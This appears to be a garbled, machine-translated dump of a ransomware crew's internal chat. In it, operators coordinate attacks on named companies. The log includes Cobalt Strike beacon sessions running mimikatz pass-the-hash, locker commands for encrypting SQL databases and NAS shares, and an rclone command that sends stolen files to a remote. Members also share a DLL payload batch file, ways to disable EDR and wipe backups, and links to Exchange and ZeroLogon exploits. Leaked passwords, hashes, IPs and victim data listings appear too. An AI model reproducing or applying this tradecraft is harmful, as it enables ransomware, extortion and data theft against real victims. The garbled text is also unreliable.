``trustanddmp ``nltest /trusted_domains ``remember the command to poll the trustdmp ? without a crude can be? from yes to one@alter what is the manual to hunt and drag terrabytes!
it's through the S3 repository implemented? o_unreal, alas, there's a battlefield here whose rocket is cooler - and he wins, so we build rockets constantly)so it's not scary) we have everything here and so requires constant support)through any channel of any software in theory there are different ways to play in principle we have someone who writes
put the tz - let's make a simplea it's perl-likehttp://github.com/RhinoSecurityLabs/external_c2_frameworkhttps://www.cobaltstrike.com/help-externalc2https://rhinosecuritylabs.com/aws/hiding-cloudcobalt-strike-beacon-c2-using-amazon-apis/не, you do not understand a little
now show the detects well I still do not have time to figure it out - if you have the desire - better to dig in this direction then http://github.com/Und3rf10w/external_c2_framework
like this, but if you are interested - cobalt has external c2 and tacda, a complete framework@all
https://blog.dylan.codes/shad0w/
interesting enough "fresh" framework
if you have time and interest - i recommend to poke around, but viola correctly hinted that you can put the client on the remote with the VPN just[ ](https://stylebrooks.com/group/general?msg=H5q2v6pjgFTsWTMPQ) if you have crones, it's hard to answer, but i do not really understand why you need sox in this chain? why not open a VPN immediately with the right part?Maybe there is some ssh access, where you can clean up with commands.I at least have not seen a two-factor on vmik or psekespopryt try through wmiexec shell open and forti process put out if there Hyper-V mikrosoft at least if you put out the hypervisor but you and all the virtuals it hosts will fall off, no? but let's know
sansp. no time. admin put out the internets on it kerberos tickets for example can be requested to get rights to shared resources this hash machine for SPN you after pth should do stiltoken this process :
```
| PID 17844
  | TID 8412
  | LSA Process is now R/W
```
which runs under the token you hackypants well if it is a live machine acct should work ... you can also try through the laughs, also should work
cme smb 127.0.0.1 -u TRUCAMTLBK4\$ -H c028fc26ba545c599adbb9b7e26964d1 -d trudeaucorp.como very defensible bekapseven in the brow here admin me worked 100% lm there whatev msf lm:ntlm suyumimik eats ntlm immediately in kobena et understandably) lm:ntlm?ntlm simpler like that śhatakoy should be ntlmc028fc26ba545c599adbb9b7e26964d1:c028fc26ba545c599adbb9b7e26964d1msfom then all bypass everything try - /user:TRUCAMTLBK4\$.salt is what but I may not mimic the correct way ``
beacon> mimikatz sekurlsa::pth /user:TRUCAMTLBK4$ /domain:trudeaucorp.com /ntlm:c028fc26ba545c599adbb9b7e26964d1
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:TRUCAMTLBK4$ /domain:trudeaucorp.com /ntlm:c028fc26ba545c599adbb9b7e26964d1 command
[+] host called home, sent: 750703 bytes
[+] received output:
user : TRUCAMTLBK4$
domain : trudeaucorp.com
program : cmd.exe
impers. : no
NTLM : c028fc26ba545c599adbb9b7e26964d1
  | PID 17844
  | TID 8412
  | LSA Process is now R/W
  | LUID 1 ; 2572284471 (00000001:9951f237)
  \_ msv1_0 - data copy @ 000001CC19EF7DD0 : OK !
  \kerberos - data copy @ 000001CC1A834828
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   \_ *Password replace @ 000001CC17DA3948 (32) -> null

beacon> shell dir \\\TRUCAMTLBK4\c$
[*] Tasked beacon to run: dir \\\TRUCAMTLBK4\c$
[+] host called home, sent: 51 bytes
[+] received output:
You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.
``And the ptx how? So give me the hash of the machine and the login in TRUCAMTLBK4\$ format, you can safely stick it into the msf.
admin is very clever about hiding backups.
urgentonasar
have a domain
need access to the machine
will this work and how to get it right
We'll have to dump all the hashes
and try to authenticate with the machine hash
Target is TRUCAMTLBK4
hash
the output is
``9051 TRUCAMTLBK4$ c028fc26ba545c599adbb9b7e26964d1 528384
```
how to shoe the hash \ token to start the machine? command\session at least what is my@all issproduce.co.uk remind someone who has a mesh in work small thismasonry is aware of the problem, they are working on it, when the fix will notify separately and ask for a ficc in #all_manuals there is a manual how to remove the bulk of the tasklist. Look for sqlserv and on these servers, look for local drives and look for .mdf code Yes, , there is such,. The database on the special control is always noticed following bug
We will locate, e.g. servers through Mount, use batch file handler.bat to stop the database and services
Locker
locker.exe -nomutex -m net - size 20 -p \\host\c$
As a result we get the following situation:
The locker goes through the whole disk, but 90% of the time it misses the .mdf file.
C:\Program Files\Microsoft SQL Server\MSSQL12345\Data\database.mdf

At this point, I strongly recommend that everyone pre-create the mass-tasklist and look where the .mdf is and locate the entire folder with the dira above

Lock like this:
```locker.exe -nomutex -m net -size 20 -p "\\host\c$\Program Files\Microsoft SQL Server\MSSQL12345"
```
Removed path MUST be in quotes, because without the quotes will be a syntax error. If everything is OK, the locker almost immediately takes the files into processing and by the date of change it is visible at onceprincezvhhitechTyr@all
https://continews.pro news domain is banned
the replacement https://continews.icuVano@Air give hell here in the new rocket it already is so do it so do it so do it so do it so do it so do it so do it so do it so do it so do it so do it so do it so do it so do it so do it so do it so do you want to tell all? @all who is that Kulibin who started it from memory, call me back who wrote that you can publish so did you fill it?
https://github.com/djhohnstein/SharpChromium
``````
Usage:
    .\SharpChromium.exe arg0 [arg1 arg2 ...]

Arguments:
    all - Retrieve all Chromium Cookies, History and Logins.
    full - The same as 'all'.
    logins - Retrieve all saved credentials that have non-empty passwords.
    history - Retrieve user's history with a count of each time the URL was
                visited, along with cookies matching those items.
    cookies [domain1.com domain2.com] - Retrieve the user's cookies in JSON format.
                                        If domains are passed, then return only
                                        cookies matching those domains. Otherwise,
                                        all cookies are saved into a temp file of
                                        the format ""%TEMP%\$browser-cookies.json"".
``jumping sanctinel there mani did a paleoload today, how's it going? @all there's free access, write to whoever needs it,``tout here.
Fort Scott Munitions, and Fort Scott Christian Learning Center?
```
not our case by any chance? i'll upload it because i can't get into the admin area, i can't get into the tor apparently it's lagging) tell me how to ask for 2 files, not leoni there requested folders listing sent it to you guys there are still pts schmiffed 1.done.generalinsulation.com a lot of data was on the servers? why not rename it) to mail the pts all still tapped there ``generalinsulation.com
7 Servers 117Works
Mega:
Info uploaded to the server
185 gb info
General Insulation Company is an insulation distributor/supplier that stocks and manufactures a wide range of industrial, commercial and fire protection products for the construction market. With an extensive network of strategically located warehouses and manufacturing facilities, General Insulation is uniquely positioned to meet customer needs in a timely manner with products that meet their specific requirements.
Revenue: Couldn't find info
Locker: Conti
Works: Air,Twin,Steven
``Weigh up the disk, go to the file-sharing site where we downloaded all the info ``but I don't know, they've got like 100kkk in revue, that's basically enough so 117 vorks in the net all downloaded everything ``info185 gig@Air pass a couple sessions on the new cobus webroot fuckin' servers have webroot ``there are webroots``?i will pull them to the kobud if its webroute not zagalnufu def on the servers there how many we have and on what server ? and run the locker the best way to get it off the fuck or what else is there ? and defender there offniservers pull in the new kobud any dsotupny voshmi yes pull them the fuck their pings still pinging then task to this batnik ``
@ECHO OFF
rundll32.exe C:\ProgramData\appman.dll,GetStdHandle
``with this kind of text, that is, you create a batch file which you drop with tascomnova1 dllprinethe vorkservices172.22.9.3
172.22.9.18
172.22.9.17
172.22.9.196
172.22.9.9
172.22.9.2
172.22.9.24
172.22.9.58data downloaded and put it together with the dll in the program, let's tighten it with a batkin and make it nice pinging your hostmix is disabled only on vorkhttp://nokuje.com
COBA://206.221.176.171:41772
yLCR4cOIzTpiXW5ioMJqAxSTqMX3WBvvOk7 if vmik is disabled twin fucks with shuffles``
name.dll, GetStdHandle
``Let's go like this, I'll give you dll and propsdashayte dll from any new coba@Air good morning raspingovyat there so gentlemen, how many dates downloaded ?2 I understand the inventory and disk, disk (2) on the logger things click?)) to remove from the center cue securely, which of the buttons to press?
1. Control Panel -> Internet Options -> Advanced (tab) -> Security ->
mark only "Use TLS 1.1" y "Use TLS 1.2

2. Control Panel -> Internet Options -> Security (tab) -> Trusted Sites -> Sites
put "add this website to the zone:" https://url_ip_site_gateway
```
this is how the problem was solveda I support it and do not take people from forums, it is easier to bring up your own rocket where the manuals within the confines of the clippings to give
the tooltip: do not work for 2 days - out, did not like it - out. normal guys easily pass such tests. i support the sandbox for newcomers should be done similarly))) myself and @fly remember) there's nothing in the archive except that there's nothing in the public. in fact, it could happen to anyone, remember how you were trained)) well, probably should not have given newcomers a case))) just keep on the net, let them take notes. the main thing is to let the newcomers know how to do it )) just let him take notes online)) and while you're looking at it even manually to install the msf on the vpstam it's been walking on the net and so on)) how come there's sorting hell moyd there are clearly our manuals
the ngrock and econnect are unlikely coincidences, i wonder if it's the same ngrock script that me and Tony wrote two years ago. where's yours from? :))) I'm in touch, write me when something appears. Hi. Happy New Year. Got it. )anyways sessions to reshoot kobyda no matter what I did not) I have 4.2 kobyda not downloaded) hi, have you anything to do? or all already downloaded? 1 minsheshady look it in the new roketesentinel not leak it without a "jump? "what is the trable to remote dump lsaas? about? buksuem (from March 24?) https://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/
if so, tell me how anyone set the sharkhrom master key when collecting passwords, how to shred the windup server before you give it to the trash?
I know about the nicks, if anyone needs to write, all sizes ..., my head is no longer thinking ... got it) thanks, let's try the fact 5-10 probably still add that the files will be old files that the locker does not touch udetob that is 260tb lock will be somewhere 26tb +-no, this locate at %10 just from the file-size 10 is the threads correctly understand? earlier just let in without increasing the flow, now I have to) gigabit 5 at us would kick - ok, 5 pieces like him will probably catch upInteresting what channel localka\nasa =) and how many disks? size nasa 600tb)) occupied 260tb400 ball, and what size is it all? 1-2tb? You probably just created a lot? ``Locker.exe -nomutex -size 10 -m net -p \\nas\papk1
``and then use \nas\papka1 /user:.``admin pass
in theory the mountain not on the letter too mountain +- the same folders in the population of pieces 400)from 1 pc (server) in 1 us...
mbr else try to attach ALL the balls on the 1 pc and he himself will see them and zamazhitEast NAS, a bunch of folders, will probably have to do a few PCs to full ball with the disks, how to make the lock as quickly as possible went only on the balls attached, the 1 pc prio 15-20 balls ?) If the remote computers will be disks with a summary size of 0 bytes? You can trim a folder or something not particularly necessary if we are talking about C $ Reformulate, what is the question? Hi all, how can you get the quickest possible lock on the balls only, if primaunchenno on each pc will be full disks?
i think you can do it in tobot, but i can't figure it out
exel is not doing it right?
F4lAsEz2nAcNgB3cpttvMAu1Jvya1vwDEGi4bJFzGxJK6npYKcBvTrWFX8FjNTDM
``it's also searchable with ost pst viewer
http://www.ostpstviewer.com/почта pst file?
Import it into your outlook and search) Guys, you need to do a keyword search in all the mail downloaded from the user, who has advice? @all better to buy a license for 20-30 bucks@all does anybody use kmsauto++ to activate windows? No, but there was a file with passwords somewhere in the classics.and how did you get the codes in ssh, were they default?I don't know if it worked in barracuda, but I'm not sure about synchronization, if it's going to wipe it in the cloud, is there an ssh? and how will you get into it? but it's possible to get into the hardware and wipe everything with ssh.
There's some kind of FS, can't remember the name right now, but there's software on githab that allows you to wipe everything in the command.Webadmin into the external domain https://auth.datto.com/loginи yes, there's a webadmin and it can be on a two-factor, like barracuda it's got redundancy set up in the cloud
barracuda has the same system, no option to delete from the cloud as such
but if you overwrite your backups on the stack, they should be deleted from the cloud as well, because there's synchronization there://invenioit.com/datto-backup/
see, there's a piece of hardware
aka backup server (physical), aka backup software, aka backup storages through the web panel ? datto also self barracuda backup encountered? with viam everything is cool, but with datto not so simple not the first and not the second time we run into datto what is your questionnea, was 2fa@all Datto backup someone gutted?
Has anyone used the FortiBrute that was written for us?
In the personal area please knock.cisco EDR hard stops the locker in the form of eexe and dll. But if you run the dll through PS and regsvr32.exe
If you run the dll through PS, regsvr32 exe, then the cisco is already starting to fart, and the locker will workooOne more time to run veeam.exe If you're talking about rd you do legitimate actions fuck itWho from under the carbon viam decrypted? @all once again to all
we have a ton of downloaded databases, LET ME have them, we will make bots out of them)))) searches the contents of all the docks in the ball via keywords or regularshttp://github.com/blacklanternsecurity/manspider
a very useful tool can be the same process explorertoolsa says it kills EDRs: //www.kitploit.com/2021/07/backstab-tool-to-kill-antimalware.html?m=1@all Urgent report who has these in operation!!!!
bobpoynter.com
silverspot.net

In PM with the current status on the case!!!
HgmX0sRHCAY56Yu0RJIA4Q2TfvAyFd9hSALE1KdKAQsNEi9oX1C4BFvC6ypWReeE
```
@all tell me whose it is plizsysadmins go to them, hash it out
print service on the print server no one will turn it off (unlike KD, for example)
and patches on the print server may not drop by so often, even when they will my main idea is to just the print server through it? hmm?
why does it not work with me =) why does it work only on the dk? does it work on the dk or wherever it is?
wn2wUb0N199FdCErCx2d881gwc3bzLriRTPLV2l1WZeA1hPMEAMSACRzSbPM9q1P
``````
Ns5WQ4hUEqxZRO4Ls1WW8wn8K95FKrkEKLxyjXjdwmjb0NpLosviDzWlNlarhNiY
```
and this? @alliche? and muzzle into it pour the second slidechnaya exactly, we did so, cops :) and all from a virtual machine ruberyprofit it cling to Deploy virtual machine take a dedicata allocated bullshit =) session cuts network proactive rephrase - when you connect a VPN falls off the external adapter
tymka not help, ngrok toorebota, anyone had a Fortica, that when you connect to a VPN can not get up a session on the VPN and within the network, too? how to solve this problem? so throw in the adminWho exit on the brute force? a couple of kerbs should runsubd with soaps means any database that contains email addressessubd with soaps means .ost or .pst file? @all please check the date on your cases, where there is a DBMS with soaps and write in the PM me the number, make them work further) who already do a color 2021 1675 ?@rozetka skim here here's also just looking for scripts to replace the work of sharpviewdobviously) now dovavlyuyut admin :) i want you to evaluate who itt what manu)? 500 strings almost!i want to know what the fuck is up with this manual? is there anybody there? i'll try to set up a free download, maybe it will work.burp suite you can use manual to configure if you also have tools will be great :) guys, did anyone work with webform brute force? need help breaking the admin which poppobuyishey creed) so you just do not have a creed, also access deny write I'm trying all this from the dc itself ``t3chnolog
the server itself is in the domaincontroller group like everyone else
```
if your target machine is in a domain - to bypass NLA you need to start a car in this domain get a trust contextNLA error hangs because you from an untrusted source try to get into the domain (i.e. from a group or vpn who are not in the target domain where the machine you need is?
winrm/wmic/schtask/psexec/rdravtorizationyou have all ports open vashchetashcha try it outentf through the DC and you through ipak address. i think this was the tie-in when i had this error. xfreerdp bypass[ ](https://stylebrooks.com/group/discussion?msg=Qwt32H77AjEyupgeY) xfreerdp yuzaytrss://blog.cobaltstrike.com/2015/07/22/winrm-is-my-remote-access-tool/ but it is rarely opened so it is unpopular as well as youzayut vmic and stask google commands5985 how to get it? https://prnt.sc/xrgh783389 not allowed by rp5985 - WinRM3389https://prnt.sc/xrfwu4вопрос how to pop in there canENIGMA

Status: Ativo
Sistema operacional: Windows
IP: 192.168.3.101
MAC: 78:E7:D1:CC:3C:88
Fabricante: Hewlett Packard
NetBIOS: HVC\ENIGMA
Usuário:
Tipo:
Data:
Comentários:
Serviço Detalhes
RDP Tunnel is Microsoft SChannel TLS: unknown service
Port 135 (TCP) Microsoft Windows RPC
Port 139 (TCP) Microsoft Windows netbios-ssn
Port 445 (TCP) Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Port 2179 (TCP)
Port 3050 (TCP) Firebird RDBMS Protocol version 10
Port 3389 (TCP) Tunnel is Microsoft SChannel TLS: unknown service
Port 5432 (TCP) PostgreSQL DB
Port 5985 (TCP) Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
Port 47001 (TCP) Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
Port 49152 (TCP)
Port 49153 (TCP)
Port 49154 (TCP)
Port 49155 (TCP)
Port 49156 (TCP)
Port 49157 (TCP)
Port 49163 (TCP)

|C:\Programdata

C:\SistemasHD
On ENIGMA 192.168.3.101 HVC Hewlett Packard 78:E7:D1:CC:3C:88 135, 139, 445
\\192.168.3.35\c$\SistemasHD
hostname=192.168.3.101
[DATABASE]
database=bd0240
[USUARIO]
username=EDUARDOR
codHospital=1gayz hi all, can anyone suggest something, the server is closed with backups, not by pehek not by explorer there by entering the folders is not included. the server itself in the domaincontroller group like all, in the DC no bans, most likely it locally inside the machine is covered, while there is a database, which works all clients in the network.and qubes os not felt? it is like a Band-Aid
try it once and like it agadas who's more comfortable
i'm just not very good with docker = )pull the script on the ensemble just in casesee what the server writes after you try to connectwmic logicaldisk get volumename,size,freeespace,caption,filesystem,drivetype,subscrirtionBoyce, how do you know how much weight the ball in the cob?This is the first time I've seen such an error....windup! java version "15.0.2" 2021-01-19data java seems to have been updatedcertin in thread "main" java.awt.HeadlessException:
No X11 DISPLAY variable was set,are you sure that you run it on the X it swearsstaraajavaGreetings all, a question on the new coba, according to the installation manual, when checking

```
"Check our profile, go to /root/cobalt

sudo ./c2lint domain.profile"
```

kicks out
```
Hook start
Found desired class: common/Authorization
Exception in thread "main" java.awt.HeadlessException:
No X11 DISPLAY variable was set,
but this program performed an operation which requires it.
        at java.desktop/java.awt.GraphicsEnvironment.checkHeadless(GraphicsEnvironment.java:165)
        at java.desktop/java.awt.Window.<init>(Window.java:545)
        At java.desktop/java.awt.Frame.<init>(Frame.java:423)
        At java.desktop/javax.swing.JFrame.<init>(JFrame.java:224)
        At aggressor.MultiFrame.<init>(Unknown Source)
        At aggressor.Aggressor.main(Unknown Source)
```
I've googled errors, i've installed all suggestions, and the result is the same: this error.
Suggest who faced with add more when not dbo but dmnu if it goes, it's obviously easier than the hands, yes) it's not hard talkkak how to do otherwise I hzya in a 3 query ddb handwritten, and the tables in the variables, it for each line will give out yep
but in the third query you would have to substitute two variables in three steps
database query
query the tables in the name ala %DB%.txt and there tables
and then polling from %DB% each row as %tables%from under cobalt kst mbmbl will either go or fuck it up, I don't know)``
@echo off
for /F %%i in (db.txt) do sqlcmd -S localhost -E -Q "USE %%i SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName, p.rows AS RowCounts, CAST(ROUND((SUM(a.total_pages) / 128.00), 2) AS NUMERIC(36, 2)) AS total_MB FROM sys.tables t INNER JOIN sys.indexes i ON t.OBJECT_ID = i.object_id INNER JOIN sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id INNER JOIN sys.allocation_units a ON p.partition_id = a.container_id INNER JOIN sys.schemas s ON t.schema_id = s.schema_id GROUP BY t.Name, s.Name, p.Rows ORDER BY RowCounts desc, Total_MB desc;" >> tables.txt
``but try it this way, I do not know if it will go or not that's the question and the crutch should be invented instead of a couple of hours of routine substitute tables databaseskl you do not turn a query into a batinck that went to the server with the database, enabled, then purely 1-5 tables needed sdamil. everything. success. minutes for 20 or pvsh codekak it all in batinck turn the question is that I turned it by hand Tovibinu
```
sqlcmd -S localhost -E -Q "USE %databasename% SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName
```
instead of %databasename% - a string from a file - you can do it through skl syntax, maybe not, googlea then you need to substitute the string from the file into skl query, one by one ``
sqlcmd -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases; >> db.txt"
```
you get the list of databases as a file, delete unnecessary rows if you have a login and passwords can connect via sox through any toolzoo and very quickly browse the smirinado that he questioned all the databases for tables and a dozen rows from each table
yesterday i searched the server there were 30 databases and tables with all sorts of shit, it takes 300 clocks to poll each table
it should be avtmoatizirovat context let's say the correct made - through the scratch management studio or through slserv the list of databases, tables, the first 10 rows in each table so if you need it for authorization through the Codes can throw a simple batik or context uhu if it does not, you need to get involved and inject into the process sklserver, the session lift that is, what you need to unload the database and the tables you need sa login to the database, I want me to run a conditional batnick or unliner and it in response to me
DATABASE
tables
examples from the tables if you're going under the token then what questionnaire, I can only give you the questionnaire by hand, if you mean authorization through the Credentials we can write anything if there is a normal TK[ ](https://stylebrooks.com/group/discussion?msg=JbThAga47LKSwLJfu) and write a DB questionnaire? not to sit and drag DBs for a couple of hours, eh?
how's that? it works on the test machine, it doesn't on the network, then form the question in as much detail as possible) and it doesn't, i just don't understand why the code doesn't work) there's a fuckload of developers and more
but you need to tzpolzernyy)write the terms of reference is there anyone who knows c++ at a decent level? `` java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -javaagent:hook.jar -jar cobaltstrike.jar $*
any problem with cilance lately? the session does not allow to raise or it can not remove? no panel, rdp no cilance without a pass through the panel removed with a reboot-some proven method is needed, no fear if you need to reboot who knows how to disable cilance and rapid7 agents? slice[ ](https://stylebrooks.com/group/discussion?msg=HbrmvvFLxZkD2sW9E) https://forum.exploit.in/topic/182703/?tab=comments#comment-1168697
))) judging by the correspondence log, the trance is getting pretty fucked up...the only thing i fucked up was my hashes and he fuckin' told me they were too fuckin' complicated
I ended up having them on my physical car in two hours instead of his hyper-duperferm
¶¶ Talked to both ¶¶
```
tranny and the cunt are having forum wars ``11tcp_bind_pipe```
Guys, and tell me another point, have rdp access to the machine, it is in the domain. I want to throw a coba, but no access to the Internet from the machine, I have user rights, and the other machines in the network Codes do not fit
```
guys, and tell me another point, have rdp access to the machine, it is in the domain. I want to fork the cob; but no access to the Internet from the machine, I have user rights, and the other machines in the network crescendos do not fitTobshabla with bothPublished: 6 minutes ago

TS. PMs in the last couple of years in my opinion the most stabile server, it's all fun
and the server as I understand it is not only me) I see
another "guru of the underground" looking for a student reseller ironkryptomaniak who made a bid ? mafia in da taunahahahsa deanon miki
 I'll buy sabj, dough get after verification of information from my deposit by transferring to my own.

The time for checking is 7 days.

Needed:
Name, date of birth, city of birth

Desirable:

Scan of passport, any pre-information, any checks on the registration or real estate

 

2Mika, you fucked me up bitch, because of you, you bitch, yesterday the deal fell through, and not like your fucking 100-dollar deals, but a big fucking deal. You're fucked, I think they'll find you for 100k, if they don't find you, I'll look elsewhere, but you fucked me up so bad I wanted to find a person from the web for the first time in my life in real life
``what's the big deal,``
the guy's a mid-level sysadmin $100k at the most they give for deanon. they're paying 100k these days, these reverberators are engineers in stockings and cat ears, he's technically talentless, i had the misfortune to talk to him, he's miserable, and it's too bad he's got no fucking reputation, because he sold his rep account. what is that tranny doing there again?i don't know what the hell is going on there, i can't help but wonder if there's a problem with thesecure server or if it's just me?
https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265почему when i try to connect over webrdp on sonic sma, i get auto-login to netextender's wpn? when i scan the pool through ais it writes dnshostnamewhat ways can i learn fdqn if nslookup does not see,and the domain to connect to the wpn is LocalDomain? in the cobalt channel where the new keith where?) thank you in continuation of exchenge
https://github.com/jsdryan/CVE-2021-26855
googletranslate from chinese still translates
and here's more from this morning.
https://github.com/alt3kx/CVE-2021-26855_PoCCodeocta0dayinbiz@all those trying to get back in after the work is done - try this script if it is valid and works as expected - it was released on the forum7 hours agohttp://github.com/Udyz/CVE-2021-26855
CVE-2021-26855 Brute Force EMail Exchange ServerA where is it?
Result
``https://dyncheck.com/scan/id/e9475dcf0a3efd9deaf3aa07a6147b5c
``Chuckhttps://github.com/KaLendsi/CVE-2021-1732-ЕхрІоітдобавьте me
not marked who has this case@all cairncapital.com whose channel? @all have cases to work, write to who do not do I recommend nmap zenmap install on the grandfather and scan the locale in the scanner settings put rdp ftp http? https://prnt.sc/10gxp3zвот so he sees the network, one iphttp://prnt.sc/10gxqmsdata on the grandfather session you raise the iphone?even if I have an ip scanner, what's the best way to scan the network, see the names of PCs, domains, etc., without having a point of entryroute print, like it should display the ip network, if I am not mistaken here is yes, there is an account, but for it the network, how to find?
adfind -h <dc ip> -u domain\user -up password -subnets -f (objectCategory=subnet) > subnets.txt
``So get the info.``
you have domain creeds from the vpn have da no, well, I'm from scratch connected and do not know what's on the network if the AD is not spelled out - the input diap + where the root servers are to startsabnets assemble through the adfindbytes in AD not all sabas are not specifiedpingani all hosts and ipam make diapykaee have options to scan the network behind the vpn? @t3chnolog thanks for the tip, everything came out can take a dedic, plug it into the VPN, and on the dedic to put vBox and shared internet with the dedic by http type.and there cobalt start pinging the routing at all?the session was not raised from under the vpn?session either do not raise the session at all, or look for a segment that is not covered by proaktivkoy (you may not find) if your session drops, the VPN segment (and most likely all network segments) under a hard network proaktivkoytimver on the dedic, or enidesk, or ngrok@allGod are solutions to bypass the following problem when you start a VPN `(forti) on the dedicates stops tapping session, the VPN is started along with the breakage of rpd, I used to be that when you start up broke the rpd to the dedic but the session continued tapping and solved all through socket. How to be in cases when it stops knocking? How else can I skip ?[ ](https://stylebrooks.com/group/general?msg=D5RMECmkEu2RzsXWZ) in case network activity is monitored not to overload the channel?[ ](https://stylebrooks.com/group/general?msg=8XN3B5vxCybHR9BDv) --bwlimit 5M
limit download speed in 5 megabits, handy flag to pass "below the radar" )guys, salaam, has anyone raised rights through dll hijacking? @all c0ntiteam41@protonmail.com whose email?[ ](https://stylebrooks.com/group/general?msg=cfo3pscHwzhwYYWAj) ``
https://www.sendspace.com/file/n7n47e
If anybody didn't know, you can filter files by date, for example --max-age option lets you specify how old files should NOT be uploaded
```
rclone.exe copy --max-age 3y "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P
```
This command will only load files not older than 2018, i.e. 2018-2021
more details - https://rclone.org/filtering/AdminSDHolder has anyone run it? it is the tricky implementation of the connection itself i have tried reverse sox implementations on verichel
firewalls cut the tunnel on tsp sockets autorun holdsNo about my rath I told you[ ](https://stylebrooks.com/group/general?msg=zhoevopRHvuQTE556) somewhere on the damag wrote about plink
```
https://gist.github.com/moshekaplan/425c2a263c3e8a0b080d
```
not really got into it myself, tunnel but kinda sticks the averamische throw bro
The linux is forty-two mb*, 40-50 min will be uploaded to sendspace, as soon as it will upload I will send you the link
pass: bhju7tgh does anybody have a video of the ms17 manual? i'm not rooting for coba, just overall empire and other frameworks not only save time but also increase the possibilities to do it with coba-like software, a lot of moves in 2 clicks are done technically, but fuck the effort
or you can use rpd and get passes in a minute
you need to look at the situation there is no universal solutionindividual for the case is all in a normal avera claudnom you in 5 seconds will shoot and write out :) well, for a certain stage of development is necessaryhttp://www.cyberark.coba would have hung quietly hash is bad or hash pull on the folders, and on the computer mimic smell you do the same way they smellkakoy through smbclient aplolyadet stylak for example a software on the password passes from the clauds in the browser or in softet to trace the admins? why?What about coba, keylogger and other utilities, without coba it would be impossible to legally track admins, but not if you use a cleartext pass to move legitimate additems in the events, it would also need to be cleaned and hope that it will not be detected) starkillerethese software have including cobalt pailoada empire gui appeared and empiretoka in any case, any software to clean at home many coadic still uzuyuta che impaket not palpai?i want to find a solution that will drop sox4/5 into local network to work in 90% of networks and impacket to mess with networks :) found it. I'll check rantime also present in empire modules https://github.com/BC-SECURITY/Empire/blob/master/changelog not a bad alternative to coba by the way, there is a built-in module obfuscatorhttp://github.the module is not a bad alternative to cob, by the way, there is a builtin module refactorhttp://jpillora/chisel/hellaisenu in the releases of EXE? on dinchek can you refactor? AB all similar softwareshttp://github.com/jpillora/chiselchisel@all who deployed cob in a localized target? what solutions do you have?
ssh is possible (in the process of release)
what else?
ideally FUD / lightweight software
even without autorun yet
any ideas / thoughts / solutions please
Thank you.
there was no such a problem before and you can access other servers through a proxy? ````
[*] Will use existing X509 certificate and keystore (for SSL)
[+] I see you're into threat replication. /root/Cobalt/xxxx.profile loaded.
[+] Team server is up on 48765
[*] SHA256 hash of SSL cert is: c9956501328161d839cd78b0d1ebf1cea6da5691d302ca0333bfc8acd4d49020
[!] Profile variant 'variant_1' does not exist. Degrading to normal profile state.
[*] Web Server will use user-specified SSL certifcate
[+] Listener: main-list started!
````

all ok on the server````
[!] Trapped java.net.SocketTimeoutException during client connect [dialog action: Connect]: Read timed out
````

tell me what could be causing this - does not want to log into the serverhttp://reconshell.com/cve-2021-21972-vcenter-rce-vulnerability-analysis/
check out this beauty@all forum/index.php?topic=47.0
a collection of tv channels and groups you may find useful or interesting@all those who have waited for more cases, write back, there are fresh dumps I do not always insert all the code, for example sharefinder
i offered it as an alternative)) you'd better just import the code into pvsh without dropping it on the disk
i suggested this as an alternative) psst is better to just import the code into a psst without dropping it on the disk - it may be very unpleasant if you catch a detection right before the lock) nimbus2000 and one more thing, because i heard from alta that someone had a psst script that doesn't start, this also applies to other ps1 scripts and those situations when the serversack without powershell isE
Example: we have a script
```
examplescript.ps1
```
The manual on the githab specifies to run it as a
```
.\examplescript.ps1
```
and then the command
```
Invoke-ExampleScript -argument
```
run it and you get an error that there is no commandlet, this is because the commands are not pulled up so (I have not worked in any case)
the solution is this: change the file extension from .ps1 to .psm1 - you get a plugin for the portshell
Open normal powershell
write
```
Import-Module .\examplescript.psm1
```
With the next command we call the function
 ```
Invoke-ExampleScript -argument
```
we get a working script:thumbsup:Guys, who will be knocking filesilla from the accesses we got with SessionGopher to the servers.
specify the protocol explicitly, because the port is not explicit, it will be specified in the output, for example, here is the output of my sessiongopher:
```
"COHLAPTOP75\CSoh", "Shopbop - Development", "z3M>uE/B", "sftp.amazonsedi.com", "2PD11LSYEWJ90", "Use SFTP", "2222"
```
if you just enter in the field host - sftp.amazonsedi.com you will not get connected because the port is not ccp 22 but 2222, in the host you need to specify the protocol explicitly that is sftp://sftp.amazonsedi.com
if it says ``.
Use FTP over TLS if available", "21"
```
then specify ftps://hostname
etc., here is a reminder just in case:
```
ftp:// - For normal ftp connection
sftp:// - ssh ftp connection
ftps:// - ftp over ssh (implicit)
ftpes:// - ftp over ssh (explicit)
``@all are there anyone without cases?
@cybercat threw in pm.morning to those who do not sleep, I remember throwing a batik, which stops all services that can interfere with the lock, throw please - urgently need and can not findhttp://www.red-gate.com/products/sql-development/sql-compare/
with this utility you can not look through the whole sql.bak, but restore a separate table from the database and see it@Air fill it in here
into the generalinsulation.com folder
and let me know how it's done
```
172.82.162.66
admin
3cT26dDrDCwS
ftp 21 port
Sometimes there is a hello who is alive? with the context thinly but cranked up) it's like ms17 on win2008buy a token somedomain\usermake_token domain/user times I took a harddisk on which napn was pulled up and went, but did not start then domain account took yesterday received a similar errorgetuid show[*] Tasked beacon to run .NET program: SharpZeroLogon.exe hopo-dc2.holly.local false check
[+] host called home, sent: 114807 bytes
[+] received output:
Performing authentication attempts...
